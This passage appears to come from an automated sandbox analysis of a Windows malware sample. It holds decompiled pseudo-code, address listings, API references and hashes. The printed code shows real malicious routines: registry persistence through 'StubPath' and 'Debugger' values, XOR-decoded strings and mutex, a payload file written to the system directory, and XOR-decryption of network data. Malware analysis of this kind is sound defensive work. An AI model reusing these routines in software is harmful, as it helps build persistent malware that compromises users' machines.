								SetFileTime(_t802[0x2b],  &(_t802[0x21]),  &(_t802[0x22]),  &(_t802[0x23]));
							}
							CloseHandle(_t802[0x28]);
							_t726 =  &(_t802[0x3d0]);
							CreateFileA(_t726, 0x80000000, 1, 0, 3, 0, 0);
							E00401251(_t802[0x26]);
							_t802[0x27] = 1;
							_t637 = RegSetValueExA(_t802[0x2b], "IsInstalled", 0, 4,  &(_t802[0x28]), 4);
							_push(_t726);
							L00405E40();
							_t638 = _t637 + 1;
							__eflags = _t638;
							RegSetValueExA(_t802[0x2b], "StubPath", 0, 1, _t726, _t638);
							_t802[0xa] = 1;
							goto L71;
						}
					}
					__eflags =  *((char*)(_t801 + 0x1e8));
					if( *((char*)(_t801 + 0x1e8)) != 0) {
						_push(_t696);
						_t651 = _t801 + 0x1bc;
						_push(_t651);
						L00405E20();
						while(1) {
							_t727 = _t801 + 0x1b8;
							_push(_t727);
							L00405E40();
							__eflags = _t651 - 0xf;
							if(_t651 > 0xf) {
								goto L41;
							}
							_t651 = _t801 + 0x1e8;
							_push(_t651);
							_push(_t727);
							L00405E30();
						}
						goto L41;
					}
					goto L37;
				}
				_t653 = RegCreateKeyA(0x80000002, 0x408720, _t801 + 0x98);
				__eflags = _t653;
				if(_t653 != 0) {
					goto L35;
				}
				_t728 = _t801 + 0x123c;
				_t654 = GetSystemDirectoryA(_t728, 0x104);
				_push( *0x4120a0);
				_push(0x41103e);
				_push(_t728);
				L00405E30();
				_push(_t654);
				L00405E30();
				_t655 = 0x407ae0;
				while(1) {
					__eflags = _t655 - 0x407b06;
					if(_t655 >= 0x407b06) {
						break;
					}
					 *_t655 =  *_t655 ^ 0x000000d4;
					_t655 =  &(_t655[1]);
				}
				_t656 = CreateMutexA(0, 0, 0x407ae0);
				 *(_t801 + 0xa0) = _t656;
				__eflags = _t656;
				if(_t656 == 0) {
					Sleep(0x7d0);
				} else {
					WaitForSingleObject(_t656, 0x2710);
					CloseHandle( *(_t801 + 0xa0));
				}
				_t729 = _t801 + 0x123c;
				SetFileAttributesA(_t729, 0x80);
				_t658 = CreateFileA(_t729, 0x40000000, 0, 0, 2, 0x80, 0);
				 *(_t801 + 0xa0) = _t658;
				__eflags = _t658;
				if(_t658 == 0) {
					L34:
					RegCloseKey( *(_t801 + 0x98));
					goto L35;
				} else {
					__eflags = _t658 - 0xffffffff;
					if(_t658 == 0xffffffff) {
						goto L34;
					}
					WriteFile(_t658, 0x407b20, 0xc00, _t801 + 0xa0, 0);
					_t661 = E004010B2();
					 *(_t801 + 0x1b) = _t661;
					__eflags = _t661;
					if(_t661 == 0) {
						 *(_t801 + 0x1b) = 0x66;
					}
					_t663 = E00401000(_t799 + 0x64);
					 *((char*)(_t663 + _t799)) = 0;
					_t780 = _t663;
					_t796 = _t663;
					_t775 =  *(_t801 + 0x14);
					_t664 = _t663 + _t799;
					while(1) {
						__eflags = _t796 - _t664;
						if(_t796 >= _t664) {
							break;
						}
						_t688 =  *(_t801 + 0x1b) & 0x000000ff ^  *_t775;
						_t775 =  &(_t775[0]);
						 *_t796 = _t688;
						_t796 = _t796 + 1;
						_t664 = _t780 + _t799;
					}
					_t665 = _t801 + 0x1568;
					_t730 = _t780 + _t799;
					_push(_t665);
					L00405E40();
					_t797 = _t730 + _t665 + 5;
					__eflags = _t797 - _t730 + 0x64;
					while(__eflags < 0) {
						 *_t797 = E004010B2();
						_t797 = _t797 + 1;
						_t31 = _t799 + 0x64; // 0x64
						__eflags = _t797 - _t780 + _t31;
					}
					 *(_t780 + _t799 + 1) = _t799;
					_t732 = _t780 + _t799;
					_push(_t801 + 0x1568);
					_t798 = _t732;
					_push( &(_t732[1]));
					L00405E20();
					_t668 =  &(_t732[0x19]);
					while(1) {
						__eflags = _t798 - _t668;
						if(_t798 >= _t668) {
							break;
						}
						 *_t798 =  *_t798 ^  *(_t801 + 0x1b) & 0x000000ff;
						_t798 =  &(_t798[0]);
						_t40 = _t799 + 0x64; // 0x64
						_t668 = _t780 + _t40;
					}
					WriteFile( *(_t801 + 0xb0), _t780, _t799 + 0x64, _t801 + 0xa0, 0);
					E00401029(_t780);
					__eflags =  *(_t801 + 0xc);
					if( *(_t801 + 0xc) != 0) {
						SetFileTime( *(_t801 + 0xac), _t801 + 0x84, _t801 + 0x88, _t801 + 0x8c);
					}
					CloseHandle( *(_t801 + 0xa0));
					_t733 = _t801 + 0x1250;
					CreateFileA(_t733, 0x80000000, 1, 0, 3, 0, 0);
					RegDeleteValueA( *(_t801 + 0x9c), "Debugger");
					_t677 = E00401251( *(_t801 + 0x98));
					_push(_t733);
					L00405E40();
					_t678 = _t677 + 1;
					__eflags = _t678;
					RegSetValueExA( *(_t801 + 0xac), "Debugger", 0, 1, _t733, _t678);
					 *(_t801 + 0x2c) = 1;
					goto L34;
				}
				L4:
				if(_t342 >= 0x408776) {
					goto L7;
				} else {
					 *_t342 =  *_t342 ^ 0x000000d4;
					_t342 =  &(_t342[1]);
					goto L4;
				}
			}

0x004044d9
0x00404517
0x0040451f
0x0040451f
0x004044db
0x004044e3
0x004044ea
0x00404504
0x00404510
0x00404510
0x00404545
0x0040454a
0x0040454a
0x00404561
0x00404561
0x00404566
0x00404568
0x00404568
0x00404569
0x00000000
0x00404569
0x0040456e
0x00404575
0x004047c9
0x004047c9
0x004047d6
0x004047de
0x004047e3
0x004047e5
0x004047f1
0x004047f1
0x004047fd
0x004047fe
0x00404835
0x004048cf
0x004048d4
0x004048d7
0x004048dc
0x004048dc
0x004048e1
0x00000000
0x00000000
0x004048e3
0x004048e6
0x004048e6
0x004048ee
0x004048ee
0x004048f3
0x00000000
0x00000000
0x004048f5
0x004048f5
0x004048f6
0x004048f6
0x004048fb
0x00404900
0x00404905
0x0040490c
0x0040490d
0x00404912
0x00404913
0x00404926
0x0040492b
0x0040492d
0x00404b8d
0x00404b94
0x00404b99
0x00404ba0
0x00404ba2
0x00404ce5
0x00404ce5
0x00404cea
0x00404cec
0x00404cee
0x00404cf0
0x00404cf0
0x00404cf2
0x00404cf9
0x00404cfe
0x00404d00
0x00404d02
0x00404d04
0x00404d04
0x00404d06
0x00404d0d
0x00404d1a
0x00404d1b
0x00404d27
0x00404d2f
0x00404d30
0x00404d35
0x00404d39
0x00404d3c
0x00404d3c
0x00404d3e
0x00000000
0x00000000
0x00404d48
0x00404d4a
0x00404d4f
0x00404d4f
0x00404d58
0x00404d65
0x00404d6a
0x00404d6c
0x00404dad
0x00404dad
0x00404dba
0x00404dbf
0x00404dc1
0x00404e76
0x00404e7a
0x00404e84
0x00404e8c
0x00404e91
0x00404e96
0x00404e9c
0x00404ea1
0x00404ea2
0x00404ea8
0x00404eae
0x00404ec6
0x00404ecb
0x00404ed2
0x00404ed4
0x00404f78
0x00404f78
0x00404f7d
0x00404f80
0x00404fa3
0x00404fb0
0x00404fb5
0x00404fba
0x00404fc1
0x00404fc7
0x00404fdf
0x00404fe4
0x00404feb
0x00404fed
0x00404ff6
0x00404ff6
0x00404ffb
0x00404ffe
0x00000000
0x00000000
0x00405006
0x0040500b
0x00405010
0x00405017
0x0040501d
0x00405035
0x0040503a
0x00405041
0x00405043
0x0040504c
0x0040504c
0x00405051
0x00405054
0x00000000
0x00000000
0x00405080
0x00405085
0x00405092
0x00405097
0x0040509c
0x004050a3
0x004050a9
0x004050c1
0x004050c6
0x004050cd
0x004050cf
0x004050d1
0x004050d8
0x004050d8
0x004050e5
0x004050ea
0x004050ef
0x004050f6
0x004050fc
0x00405114
0x00405119
0x00405120
0x00405122
0x00405124
0x00405153
0x00405153
0x0040515b
0x0040515b
0x00405163
0x0040517c
0x0040517c
0x00405186
0x0040518e
0x00405193
0x00405198
0x00405199
0x004051a0
0x004051b0
0x004051b7
0x004051c7
0x004051ce
0x004051d3
0x004051d8
0x004051d8
0x004051dd
0x00000000
0x00000000
0x004051df
0x004051e2
0x004051e2
0x004051fe
0x00405203
0x00405205
0x00405229
0x00405229
0x0040522e
0x00405237
0x0040523e
0x00405243
0x00405244
0x00405249
0x00405249
0x0040525d
0x0040525d
0x0040526e
0x0040527a
0x0040527f
0x0040527f
0x00405286
0x004054f1
0x0040550f
0x00405514
0x00405519
0x00405519
0x0040551e
0x00000000
0x00000000
0x00405520
0x00405523
0x00405523
0x00405526
0x0040552e
0x00405538
0x0040553d
0x00405542
0x00000000
0x00000000
0x00405548
0x00405550
0x00405558
0x0040555d
0x0040555f
0x004057d5
0x004057d5
0x004057f2
0x004057f2
0x004057fa
0x004057fa
0x00405802
0x00405804
0x00405806
0x0040580b
0x00405810
0x00405815
0x0040581a
0x0040581f
0x0040582c
0x00405831
0x00405831
0x00405834
0x00405839
0x00405841
0x00405849
0x00405863
0x00405868
0x0040586a
0x00405873
0x00405878
0x0040589d
0x004058a2
0x004058a3
0x004058a8
0x004058a8
0x004058bb
0x004058c7
0x004058c7
0x0040586a
0x004058cc
0x004058d1
0x004058d8
0x00405933
0x00405938
0x0040593a
0x00405957
0x00405957
0x0040595e
0x0040595f
0x00405964
0x00405964
0x00405965
0x00405966
0x00405967
0x00405969
0x0040596b
0x00000000
0x0040596b
0x0040594e
0x00405953
0x00405955
0x00000000
0x00000000
0x00000000
0x004058da
0x004058dc
0x004058e4
0x004058f4
0x004058f9
0x004058fb
0x00405989
0x00405989
0x0040598e
0x00000000
0x00000000
0x00405996
0x004059b8
0x004059bd
0x004059bf
0x004059e7
0x00405a04
0x00405a10
0x00405a15
0x00405a17
0x00405a1f
0x00405a24
0x00405a2b
0x00405a32
0x00405a9f
0x00405aa4
0x00405aa6
0x00000000
0x00000000
0x00405aa8
0x00405aa9
0x00405abe
0x00405ada
0x00405ae6
0x00405af6
0x00405afb
0x00405afd
0x00000000
0x00000000
0x00405aff
0x00405b06
0x00000000
0x00405b06
0x00405a3f
0x00405a44
0x00405a46
0x00000000
0x00000000
0x00405a53
0x00405a58
0x00405a59
0x00405a71
0x00405a8d
0x00000000
0x00405a8d
0x004059de
0x004059e3
0x004059e5
0x00000000
0x00000000
0x00000000
0x004059e5
0x00405908
0x0040590d
0x0040590e
0x00405914
0x00405915
0x00405916
0x00405918
0x0040591a
0x00405971
0x00405978
0x00405984
0x00000000
0x00405984
0x00405b0b
0x00405b15
0x00405b1f
0x00405b24
0x00405b24
0x00405b24
0x00405b24
0x00405b4c
0x00405b51
0x00405b53
0x00405b59
0x00405b66
0x00405b78
0x00405b7d
0x00405b7f
0x00405b85
0x00405b86
0x00405b88
0x00405b8c
0x00405bae
0x00405bb8
0x00405bbd
0x00405bc4
0x00405be5
0x00405bc6
0x00405bd1
0x00405bd9
0x00405bd9
0x00405b8e
0x00405b9e
0x00405b9e
0x00405b8c
0x00405bee
0x00405bee
0x00000000
0x00405b53
0x00405583
0x00405588
0x0040558a
0x004057de
0x004057e2
0x00000000
0x00000000
0x004057e4
0x004057e4
0x00000000
0x004057e4
0x00405590
0x00405595
0x0040559a
0x004055a7
0x004055bf
0x004055c4
0x004055c6
0x004055dc
0x004055e8
0x004055ed
0x00405669
0x00405669
0x00405670
0x004056a9
0x004056a9
0x004056cf
0x004056d1
0x004056e7
0x004056e7
0x004056ec
0x004056ee
0x004057cc
0x004057d0
0x00000000
0x004057d0
0x004056f4
0x004056fd
0x004056ff
0x00405705
0x00405708
0x0040572b
0x0040572b
0x00405738
0x00405750
0x00405755
0x00405757
0x00405761
0x00405761
0x00405766
0x00405769
0x0040576d
0x0040576d
0x0040577c
0x00405781
0x00000000
0x00405783
0x00405783
0x00405788
0x0040578a
0x00000000
0x00000000
0x0040578c
0x00405795
0x00405797
0x0040579d
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a4
0x004057a5
0x004057a7
0x004057a9
0x004057ae
0x004057b5
0x004057be
0x004057c3
0x00000000
0x004057c3
0x00405781
0x00405712
0x00405716
0x0040571a
0x0040571c
0x0040571d
0x0040571f
0x00405721
0x00000000
0x00405721
0x004056e0
0x004056e5
0x00000000
0x00000000
0x00000000
0x004056e5
0x00405672
0x0040567b
0x0040567d
0x00405683
0x00405686
0x00000000
0x00000000
0x00405690
0x00405694
0x00405698
0x0040569a
0x0040569b
0x0040569d
0x0040569f
0x00000000
0x0040569f
0x004055ef
0x004055f4
0x004055f6
0x00000000
0x00000000
0x00405605
0x0040560b
0x0040560d
0x0040560f
0x00405611
0x00405619
0x0040561f
0x00405622
0x00405624
0x00405624
0x00405622
0x0040562a
0x0040562f
0x00405631
0x0040565f
0x00405633
0x0040563b
0x00405640
0x00405642
0x00405647
0x0040564d
0x0040564f
0x00405654
0x00405656
0x00405656
0x00405654
0x00405658
0x00405658
0x00000000
0x00405631
0x004055cc
0x004055d1
0x004055d6
0x00000000
0x00000000
0x00000000
0x004057ee
0x004057ee
0x004057ee
0x004057ee
0x00000000
0x004057ee
0x0040552e
0x0040528c
0x00405291
0x00405291
0x00405296
0x00000000
0x00000000
0x00405298
0x0040529b
0x0040529b
0x0040529e
0x004052a3
0x004052a3
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052ad
0x004052ad
0x004052b0
0x004052c2
0x004052c7
0x004052c9
0x004052e5
0x004052f1
0x004052f1
0x004052f6
0x004052fb
0x004052fb
0x00405300
0x00000000
0x00000000
0x00405302
0x00405305
0x00405305
0x00405308
0x0040530d
0x0040530d
0x00405312
0x00000000
0x00000000
0x00405314
0x00405317
0x00405317
0x0040531a
0x0040531f
0x0040531f
0x00405324
0x00000000
0x00000000
0x00405326
0x00405329
0x00405329
0x0040532c
0x00405331
0x00405331
0x00405336
0x00000000
0x00000000
0x00405338
0x0040533b
0x0040533b
0x0040533e
0x00405343
0x00405343
0x00405348
0x00000000
0x00000000
0x0040534a
0x0040534d
0x0040534d
0x00405362
0x00405367
0x00405369
0x0040536d
0x00405385
0x0040539d
0x004053b5
0x004053cd
0x004053d9
0x004053d9
0x004053de
0x004053e3
0x004053e3
0x004053e8
0x00000000
0x00000000
0x004053ea
0x004053ed
0x004053ed
0x00405402
0x00405407
0x00405409
0x00000000
0x00000000
0x00405413
0x00405418
0x00405420
0x00405422
0x00405427
0x00405432
0x00405432
0x00405437
0x00000000
0x00000000
0x00405439
0x0040543c
0x0040543c
0x0040543f
0x00405484
0x00405488
0x00405488
0x004054ab
0x004054b0
0x004054b2
0x00000000
0x00000000
0x00405449
0x0040544e
0x00405457
0x0040545c
0x0040545e
0x00405468
0x00405468
0x0040545e
0x0040546d
0x0040546d
0x0040546d
0x00405471
0x00405479
0x00405479
0x004054b4
0x004054c7
0x004054c7
0x004054c8
0x004054d9
0x004054e0
0x004054ec
0x00000000
0x004054ec
0x00405220
0x00405225
0x00405227
0x00000000
0x00000000
0x00000000
0x00405227
0x00405126
0x00405129
0x00000000
0x00000000
0x0040512b
0x00405140
0x0040514c
0x00000000
0x0040514c
0x004050d3
0x004050d6
0x00000000
0x00000000
0x00000000
0x004050d6
0x00405045
0x00405046
0x00404ee1
0x00404efc
0x00404f01
0x00404f06
0x00404f27
0x00404f27
0x00404f33
0x00404f38
0x00404f40
0x00404f42
0x00404f47
0x00404f4f
0x00404f54
0x00404f57
0x00404f59
0x00404f5b
0x00404f5d
0x00404f63
0x00404f68
0x00404f68
0x00404f6b
0x00404f6d
0x00404f72
0x0040505c
0x0040505c
0x00405061
0x0040507b
0x00000000
0x0040507b
0x00000000
0x00405046
0x00404fef
0x00404ff0
0x00000000
0x00000000
0x00000000
0x00404ff0
0x00404f82
0x00404f82
0x00404f8a
0x00404f8c
0x00404f98
0x00000000
0x00404f98
0x00404eda
0x00404edb
0x00000000
0x00000000
0x00000000
0x00404dc7
0x00404dc7
0x00404dd7
0x00404ddc
0x00404dde
0x00000000
0x00000000
0x00404df7
0x00404dfc
0x00404e03
0x00404e05
0x00000000
0x00000000
0x00404e07
0x00404e08
0x00000000
0x00000000
0x00404e0a
0x00404e20
0x00404e2c
0x00404e48
0x00404e4d
0x00404e54
0x00404e5b
0x00404e62
0x00404e62
0x00404e64
0x00000000
0x00000000
0x00404e6e
0x00404e70
0x00404e71
0x00404e73
0x00404e73
0x00000000
0x00404e62
0x00404dc1
0x00404d6e
0x00404d75
0x00404d76
0x00404d78
0x00404d7d
0x00404d7e
0x00404d83
0x00404d85
0x00000000
0x00000000
0x00404d87
0x00404d89
0x00404d8e
0x00404d90
0x00404d92
0x00404d94
0x00404d99
0x00404d9a
0x00404d9f
0x00404da6
0x00404da8
0x00000000
0x00000000
0x00404daa
0x00404dab
0x00000000
0x00000000
0x00000000
0x00404dab
0x00404bae
0x00404bba
0x00404bbf
0x00404bc6
0x00404bcd
0x00404bd4
0x00404bd4
0x00404bd6
0x00000000
0x00000000
0x00404be0
0x00404be2
0x00404be3
0x00404be5
0x00404be5
0x00404be8
0x00404bee
0x00404bf5
0x00404bf6
0x00404bfb
0x00404bfd
0x00404c18
0x00404c1d
0x00404c25
0x00404c2b
0x00000000
0x00404c2b
0x00404c06
0x00404c07
0x00404c0e
0x00404c0f
0x00404c14
0x00404c16
0x00404c4c
0x00404c51
0x00404c58
0x00404c5a
0x00000000
0x00000000
0x00404c5c
0x00404c5f
0x00000000
0x00000000
0x00404c64
0x00404c69
0x00404c6d
0x00404c6f
0x00404c8c
0x00404c92
0x00404c9b
0x00404ca0
0x00404ca4
0x00404ca6
0x00404cad
0x00404caf
0x00404cb4
0x00404cb7
0x00404cbe
0x00404cc3
0x00404cc3
0x00404cc5
0x00404cd0
0x00404cd4
0x00404cd5
0x00000000
0x00404cc7
0x00404cc9
0x00000000
0x00404cc9
0x00404cc5
0x00404cdb
0x00000000
0x00404cdb
0x00404c71
0x00404c78
0x00404c78
0x00000000
0x00404c16
0x00404938
0x00404940
0x00404945
0x0040494b
0x00404950
0x00404951
0x00404956
0x00404957
0x0040495c
0x00404961
0x00404961
0x00404966
0x00000000
0x00000000
0x00404968
0x0040496b
0x0040496b
0x00404977
0x0040497c
0x00404983
0x00404985
0x004049a5
0x00404987
0x0040498d
0x00404999
0x00404999
0x004049af
0x004049b7
0x004049cf
0x004049d4
0x004049db
0x004049dd
0x00404b6f
0x00404b76
0x00404b88
0x00000000
0x004049e3
0x004049e3
0x004049e6
0x00000000
0x00000000
0x00404a01
0x00404a06
0x00404a0b
0x00404a0f
0x00404a11
0x00404a13
0x00404a13
0x00404a1b
0x00404a20
0x00404a25
0x00404a27
0x00404a29
0x00404a2d
0x00404a30
0x00404a30
0x00404a32
0x00000000
0x00000000
0x00404a39
0x00404a3b
0x00404a3c
0x00404a3e
0x00404a3f
0x00404a3f
0x00404a44
0x00404a4b
0x00404a4e
0x00404a4f
0x00404a54
0x00404a5b
0x00404a5d
0x00404a64
0x00404a66
0x00404a67
0x00404a6b
0x00404a6b
0x00404a6f
0x00404a7a
0x00404a7d
0x00404a81
0x00404a83
0x00404a84
0x00404a89
0x00404a8c
0x00404a8c
0x00404a8e
0x00000000
0x00000000
0x00404a95
0x00404a97
0x00404a98
0x00404a98
0x00404a98
0x00404ab4
0x00404abb
0x00404ac0
0x00404ac5
0x00404ae6
0x00404ae6
0x00404af2
0x00404b06
0x00404b0e
0x00404b1a
0x00404b1f
0x00404b44
0x00404b49
0x00404b4a
0x00404b4f
0x00404b4f
0x00404b62
0x00404b67
0x00000000
0x00404b67
0x004049dd
0x004047e7
0x004047ef
0x00404805
0x00404806
0x0040480d
0x0040480e
0x00404823
0x00404823
0x0040482a
0x0040482b
0x00404830
0x00404833
0x00000000
0x00000000
0x00404815
0x0040481c
0x0040481d
0x0040481e
0x0040481e
0x00000000
0x00404823
0x00000000
0x004047ef
0x0040458d
0x00404592
0x00404594
0x00000000
0x00000000
0x0040459f
0x004045a7
0x004045ac
0x004045b2
0x004045b7
0x004045b8
0x004045bd
0x004045be
0x004045c3
0x004045c8
0x004045c8
0x004045cd
0x00000000
0x00000000
0x004045cf
0x004045d2
0x004045d2
0x004045de
0x004045e3
0x004045ea
0x004045ec
0x0040460c
0x004045ee
0x004045f4
0x00404600
0x00404600
0x00404616
0x0040461e
0x00404636
0x0040463b
0x00404642
0x00404644
0x004047bd
0x004047c4
0x00000000
0x0040464a
0x0040464a
0x0040464d
0x00000000
0x00000000
0x00404668
0x0040466d
0x00404672
0x00404676
0x00404678
0x0040467a
0x0040467a
0x00404682
0x00404687
0x0040468c
0x0040468e
0x00404690
0x00404694
0x00404697
0x00404697
0x00404699
0x00000000
0x00000000
0x004046a0
0x004046a2
0x004046a3
0x004046a5
0x004046a6
0x004046a6
0x004046ab
0x004046b2
0x004046b5
0x004046b6
0x004046bb
0x004046c2
0x004046c4
0x004046cb
0x004046cd
0x004046ce
0x004046d2
0x004046d2
0x004046d6
0x004046e1
0x004046e4
0x004046e8
0x004046ea
0x004046eb
0x004046f0
0x004046f3
0x004046f3
0x004046f5
0x00000000
0x00000000
0x004046fc
0x004046fe
0x004046ff
0x004046ff
0x004046ff
0x0040471b
0x00404722
0x00404727
0x0040472c
0x0040474d
0x0040474d
0x00404759
0x0040476d
0x00404775
0x00404786
0x00404792
0x00404797
0x00404798
0x0040479d
0x0040479d
0x004047b0
0x004047b5
0x00000000
0x004047b5
0x0040454f
0x00404554
0x00000000
0x00404556
0x00404556
0x00404559
0x00000000
0x00404559

APIs

GetFileSize.KERNEL32(?,00000000), ref: 004044DE

Part of subcall function 00401000: RtlAllocateHeap.KERNEL32(00000000,00000020,00401F95,00000000,?,?,00403EF3,?,80000000,00000001,00000000,00000003,00000000,00000000,wininet.dll,iphlpapi.dll), ref: 00401009

ReadFile.KERNEL32(?,?,00000000,?,00000000,?,00000000), ref: 00404504
CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,00000000), ref: 00404510
CreateThread.KERNEL32 ref: 0040453F
CloseHandle.KERNEL32(00000000,00000000,00001000,00401038,?,00000000,?,?,80000000,00000001,00000000,00000003,00000000,00000000,%ComSpec%,?), ref: 00404545

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$AllocateCreateHeapReadSizeThread
String ID:
API String ID: 2298506686-0
Opcode ID: 1bdf9ad1154a04685c8f6efcf27d70099599908b2f13d471d88d99be1cec595e
Instruction ID: 41918153c50fc80e01e0602b9695f9ed68f71825d170eb288a542c14e04ea336
Opcode Fuzzy Hash: 1bdf9ad1154a04685c8f6efcf27d70099599908b2f13d471d88d99be1cec595e
Instruction Fuzzy Hash: AEF0A4701087447AD7206AB48C06F6B3188EB85744F60093FB3C5F60D1DA789900876B

Uniqueness

Uniqueness Score: -1.00%

Function 00401E00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00401E00(intOrPtr* __eax, void* __edx, long _a4) {
				void* _v284;
				char _v288;
				long _v292;
				intOrPtr _v296;
				char _v300;
				intOrPtr _v308;
				signed int _v312;
				signed char _v321;
				signed int _v322;
				signed int _v323;
				char* _t40;
				signed int _t41;
				signed int _t43;
				signed int _t45;
				signed int* _t47;
				void* _t58;
				signed int _t59;
				signed int _t61;
				signed int _t63;
				signed int* _t66;
				intOrPtr* _t69;
				long _t70;
				signed int* _t71;
				signed int* _t72;
				void* _t73;
				signed int* _t74;
				void* _t82;

				_t72 = __edx;
				_t69 = __eax;
				_t74 = _t73 - 0x120;
				_t70 = _a4;
				if( *__eax == 0) {
					_t58 =  *(__eax + 4);
					_v300 = 0x28;
					_v296 = 0;
					_v284 = _t58;
					_v288 = 1;
					_push( &_v300);
					_push(0);
					_push(0);
					_t40 =  &_v288;
					_push(_t40);
					_push(0);
					L00406120();
					_t63 = __edx | 0xffffffff;
					_t41 = _t40 - 1;
					__eflags = _t41;
					if(_t41 == 0) {
						_push(0);
						_push(_t70);
						_push(__edx);
						_push(_t58);
						L00406130();
						_t63 = _t41;
					}
					_v312 = _t63;
				} else {
					_t41 = InternetReadFile( *(__eax + 4), __edx, _t70,  &_v292);
					if(_t41 == 0) {
						_v308 = 0xffffffff;
					}
				}
				_t61 = _v312;
				if(((_t41 & 0xffffff00 | _t61 != 0x00000000) & (0 | _t61 != 0xffffffff)) == 0 ||  *((intOrPtr*)(_t69 + 0x10)) == 0) {
					L32:
					_t43 = _v312;
					goto L33;
				} else {
					_t59 = _t61;
					_t71 = _t72;
					 *_t74 =  *(_t69 + 8);
					_t45 =  *(_t69 + 0xc);
					_t82 = _t45 - 2;
					if(_t82 == 0) {
						L16:
						_t66 = _t71;
						_t71 =  &(_t71[0]);
						 *_t66 =  *_t66 ^ _v322 & 0x000000ff;
						_t59 = _t59 - 1;
						__eflags = _t59;
						if(_t59 != 0) {
							L19:
							_t47 = _t71;
							_t59 = _t59 - 1;
							_t71 =  &(_t71[0]);
							 *_t47 =  *_t47 ^ _v321 & 0x000000ff;
							__eflags =  *_t47;
							L20:
							 *_t74 = E00401DD7(_t74, 4);
							L21:
							if(_t59 <= 3) {
								 *(_t69 + 0xc) = _t59;
								__eflags = _t59 - 2;
								if(__eflags == 0) {
									L29:
									_t34 =  &(_t71[0]);
									 *_t34 = _t71[0] ^ _v323 & 0x000000ff;
									__eflags =  *_t34;
									L30:
									 *_t71 =  *_t71 ^  *_t74 & 0x000000ff;
									__eflags =  *_t71;
									L31:
									 *(_t69 + 8) =  *_t74;
									goto L32;
								}
								if(__eflags > 0) {
									__eflags = _t59 - 3;
									if(_t59 != 3) {
										goto L31;
									}
									_t31 =  &(_t71[0]);
									 *_t31 = _t71[0] ^ _v322 & 0x000000ff;
									__eflags =  *_t31;
									goto L29;
								}
								__eflags = _t59 == 1;
								if(_t59 == 1) {
									goto L30;
								}
								goto L31;
							}
							_t59 = _t59 - 4;
							 *_t71 =  *_t71 ^  *_t74;
							_t71 =  &(_t71[1]);
							goto L20;
						}
						 *(_t69 + 0xc) = 3;
						L18:
						_t43 = _t61;
						L33:
						return _t43;
					}
					if(_t82 > 0) {
						__eflags = _t45 - 3;
						if(_t45 == 3) {
							goto L19;
						}
						goto L21;
					}
					if(_t45 == 1) {
						_t71 =  &(_t71[0]);
						 *_t72 =  *_t72 ^ _v323 & 0x000000ff;
						_t59 = _t59 - 1;
						__eflags = _t59;
						if(_t59 != 0) {
							goto L16;
						}
						 *(_t69 + 0xc) =  *(_t69 + 0xc) + 1;
						goto L18;
					}
					goto L21;
				}
			}

0x00401e01
0x00401e04
0x00401e08
0x00401e0e
0x00401e18
0x00401e38
0x00401e3b
0x00401e43
0x00401e4b
0x00401e53
0x00401e5b
0x00401e5c
0x00401e5e
0x00401e60
0x00401e64
0x00401e65
0x00401e67
0x00401e6c
0x00401e6f
0x00401e6f
0x00401e70
0x00401e72
0x00401e74
0x00401e75
0x00401e76
0x00401e77
0x00401e7c
0x00401e7c
0x00401e7e
0x00401e1a
0x00401e24
0x00401e2c
0x00401e2e
0x00401e2e
0x00401e2c
0x00401e82
0x00401e95
0x00401f4a
0x00401f4a
0x00000000
0x00401ea5
0x00401ea8
0x00401eaa
0x00401eac
0x00401eaf
0x00401eb2
0x00401eb5
0x00401ed6
0x00401edb
0x00401edd
0x00401ede
0x00401ee0
0x00401ee0
0x00401ee1
0x00401eee
0x00401ef3
0x00401ef5
0x00401ef6
0x00401ef7
0x00401ef7
0x00401ef9
0x00401f05
0x00401f08
0x00401f0b
0x00401f1a
0x00401f1d
0x00401f20
0x00401f36
0x00401f3b
0x00401f3b
0x00401f3b
0x00401f3e
0x00401f42
0x00401f42
0x00401f44
0x00401f47
0x00000000
0x00401f47
0x00401f22
0x00401f29
0x00401f2c
0x00000000
0x00000000
0x00401f33
0x00401f33
0x00401f33
0x00000000
0x00401f33
0x00401f24
0x00401f25
0x00000000
0x00000000
0x00000000
0x00401f27
0x00401f10
0x00401f13
0x00401f15
0x00000000
0x00401f15
0x00401ee3
0x00401eea
0x00401eea
0x00401f4e
0x00401f58
0x00401f58
0x00401eb7
0x00401ebe
0x00401ec1
0x00000000
0x00000000
0x00000000
0x00401ec3
0x00401eba
0x00401eca
0x00401ecb
0x00401ece
0x00401ece
0x00401ecf
0x00000000
0x00000000
0x00401ed1
0x00000000
0x00401ed1
0x00000000
0x00401ebc

APIs

InternetReadFile.WININET(?,?,?,?), ref: 00401E24
select.WS2_32(00000000,?,00000000,00000000,00000028), ref: 00401E67
recv.WS2_32(?,?,?,00000000), ref: 00401E77

Strings

(, xrefs: 00401E3B

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
